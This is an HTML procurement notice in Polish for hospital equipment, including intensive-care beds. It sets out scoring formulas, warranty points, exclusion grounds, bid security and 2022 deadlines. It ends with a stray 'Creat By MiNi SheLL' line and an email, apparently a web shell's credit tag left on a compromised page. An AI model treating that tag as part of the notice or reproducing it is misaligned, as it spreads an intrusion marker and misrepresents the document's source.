zasadami:<br/><br/>	- 24 miesiące od podpisania protokołu instalacji – 0 pkt<br/>	- 36 miesięcy od podpisania protokołu instalacji – 5 pkt<br/>	- 48 miesięcy od podpisania protokołu instalacji – 10 pkt<br/>	- 60 miesięcy i dłużej od podpisania protokołu instalacji – 20 pkt<br/><br/>Wykonawca nie może zaoferować okresu gwarancji krótszego niż 24 miesiące liczonych od dnia podpisania protokołu instalacji. Podanie krótszego okresu gwarancji, niż wymagany przez Zamawiającego, skutkować będzie odrzuceniem oferty. Zamawiający nie stawia górnej granicy okresu gwarancji, jednakże maksymalny okres gwarancji punktowany przez Zamawiającego wynosi 60 miesięcy. W przypadku wskazania okresu gwarancji dłuższego niż 60 miesięcy, Wykonawca otrzyma 10 punktów.<br/>Okres gwarancji Wykonawca zobowiązany jest wskazać w pkt 4.1. formularza oferty (załącznik nr 1 do SWZ). Zaoferowany przez Wykonawców okres gwarancji musi być wyrażony w pełnych miesiącach.<br/><br/>3. Jako najkorzystniejszą Zamawiający wybierze ofertę, która uzyska najwyższą ilość punktów (NLP) obliczoną wg poniższego wzoru:<br/><br/>	NLP = A + B<br/>	NLP – najwyższa liczba punktów<br/>	A - liczba punktów uzyskanych w kryterium – cena ofertowa,<br/>	B - liczba punktów uzyskanych w kryterium – okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest łóżko do intensywnej terapii - 7 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192120-9 - Łóżka szpitalne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>Dla zadania nr 1 i 3:<br/><br/> 1.1 cena ofertowa = 80 pkt<br/> 1.2 okres gwarancji = 10 pkt<br/> 1.3 parametry techniczne = 10 pkt<br/>2. Sposób oceny ofert<br/>Wartość punktowa zostanie ustalona na podstawie następujących obliczeń:<br/><br/>2.1 Składnik A – dotyczy kryterium „cena ofertowa” (maksymalna ilość punktów jaką można uzyskać w kryterium „cena ofertowa” wynosi 80 pkt) <br/><br/> najniższa cena oferty<br/>Wartość punktowa = ------------------------------------ x	80 pkt<br/> cena oferty badanej <br/><br/>2.2. Składnik B - dotyczy kryterium „okres gwarancji” (maksymalna ilość punktów jaką można uzyskać w kryterium „okres gwarancji” wynosi 10 punktów), gdzie: „ilość punktów uzyskana przez ofertę” oznacza ilość punktów ustalonych dla badanej oferty zgodnie z poniższymi zasadami:<br/><br/>	- 24 miesiące od podpisania protokołu instalacji – 0 pkt<br/>	- 36 miesięcy od podpisania protokołu instalacji – 2 pkt<br/>	- 48 miesięcy od podpisania protokołu instalacji – 7 pkt<br/>	- 60 miesięcy i dłużej od podpisania protokołu instalacji – 10 pkt<br/><br/>Wykonawca nie może zaoferować okresu gwarancji krótszego niż 24 miesiące liczonych od dnia podpisania protokołu instalacji. Podanie krótszego okresu gwarancji, niż wymagany przez Zamawiającego, skutkować będzie odrzuceniem oferty. Zamawiający nie stawia górnej granicy okresu gwarancji, jednakże maksymalny okres gwarancji punktowany przez Zamawiającego wynosi 60 miesięcy. W przypadku wskazania okresu gwarancji dłuższego niż 60 miesięcy, Wykonawca otrzyma 10 punktów.<br/>Okres gwarancji Wykonawca zobowiązany jest wskazać w pkt 4.1. formularza oferty (załącznik nr 1 do SWZ). Zaoferowany przez Wykonawców okres gwarancji musi być wyrażony w pełnych miesiącach.<br/><br/>2.3. Składnik C - dotyczy kryterium „Parametry techniczne” (maksymalna ilość punktów jaką można uzyskać<br/>w kryterium „Parametry techniczne” wynosi 10 punktów), gdzie „ilość punktów	uzyskana przez ofertę” - oznacza ilość punktów ustalonych dla badanej oferty zgodnie z poniższymi zasadami:<br/><br/> Suma punktów za parametry <br/>techniczne w badanej ofercie<br/>	Wartość punktowa składnika C	= ------------------------------------ x 10 pkt<br/> Suma punktów za parametry<br/>techniczne w danym zadaniu<br/>Uwaga:<br/>1) „Suma punktów za parametry techniczne w badanej ofercie” – oznacza sumę uzyskanych punktów, wyliczoną wg pozycji punktowanych, zgodnie z informacją wskazaną przez Wykonawcę w formularzu cenowo - technicznym w badanej ofercie.<br/>2) Jeżeli w formularzu cenowo - technicznym, Wykonawca nie wskaże żadnej opcji przy punktowanej pozycji, Zamawiający przyzna w tej pozycji (dla ocenianego parametru) 0 punktów.<br/>3) „Suma punktów za parametry techniczne w danym zadaniu” – oznacza największą możliwą sumę punktów wyliczoną wg pozycji punktowanych, zgodnie z informacją Zamawiającego w formularzu cenowo - technicznym.<br/><br/>3. Jako najkorzystniejszą Zamawiający wybierze ofertę, która uzyska najwyższą ilość punktów (NLP) obliczoną wg poniższego wzoru:<br/><br/>	NLP = A + B + C<br/>	NLP – najwyższa liczba punktów<br/>	A - liczba punktów uzyskanych w kryterium – cena ofertowa,<br/>	B - liczba punktów uzyskanych w kryterium – okres gwarancji<br/>	C – liczba punktów uzyskanych w kryterium – parametry techniczne</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4.1. Na potwierdzenie braku<br/>podstaw wykluczenia z postępowania o udzielenie zamówienia oświadczenia Wykonawcy, o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 5 ustawy,<br/>b) art. 109 ust. 1 pkt 4 ustawy.<br/>c) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. (Dz. U. 2022 poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2. Na ofertę składają się:<br/>2.1. Formularz oferty – załącznik nr 1 do SWZ<br/>2.2. Formularz cenowy – załącznik nr 2 - 4 do SWZ.<br/>Każdy Wykonawca może złożyć tylko jedną ofertę. Ofertę należy sporządzić zgodnie z wymogami SWZ.<br/>Do oferty należy dołączyć:<br/>3.1. Oświadczenie o braku podstaw wykluczenia stanowiące – załącznik nr 6 do SWZ. Oświadczenie, o którym mowa,<br/>stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert, tymczasowo zastępujący wymagane<br/>przez zamawiającego podmiotowe środki dowodowe.<br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. oświadczenie składa każdy z<br/>wykonawców składających ofertę wspólną.<br/>3.2. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania.<br/>3.2.1. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w<br/>punkcie 10 Formularza Oferty.<br/>3.2.2. W przypadku wskazania przez wykonawcę dostępności dokumentów, o których mowa punkcie 3.2., pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy<br/>przedstawienia tłumaczenia na język polski pobranych samodzielnie przez zamawiającego dokumentów.<br/>3.3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy w przypadku, gdy umocowanie nie wynika z<br/>dokumentów, o których mowa w punkcie 3.2. oraz w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale w takiej samej formie, jak składana oferta (tj. w<br/>formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym<br/>podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>3.4. Dowód wniesienia wadium:<br/>a) w przypadku wniesienia wadium w postaci niepieniężnej należy dołączyć do oferty oryginał dokumentu potwierdzającego<br/>wniesienie wadium zgodnie z pkt 5 Rozdziału VIII SWZ;<br/>b) w przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania<br/>przelewu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: <br/>1)	Zadanie nr 1: 2 300,00 zł.<br/>2)	Zadanie nr 2: 2 500,00 zł.<br/>3)	Zadanie nr 3: 5 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo – zgodnie z rozdz. X ppkt. 3.3.<br/>SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy<br/>podmiotów składających wspólnie ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub pełnomocnika).<br/>4. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>składających wspólną ofertę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Istotne dla Zamawiającego postanowienia umowy, zawiera załączony do niniejszej SWZ wzór umowy (Załącznik nr 5 do SWZ). Zamawiający dopuszcza możliwość zmiany umowy w sprawie realizacji zamówienia publicznego. Zmiana umowy w sprawie realizacji zamówienia publicznego jest możliwa tylko w zakresie wynikającym z ustawy Pzp (art. 455 ustawy) oraz w przypadkach przewidzianych w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-20 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_zgora/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-20 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com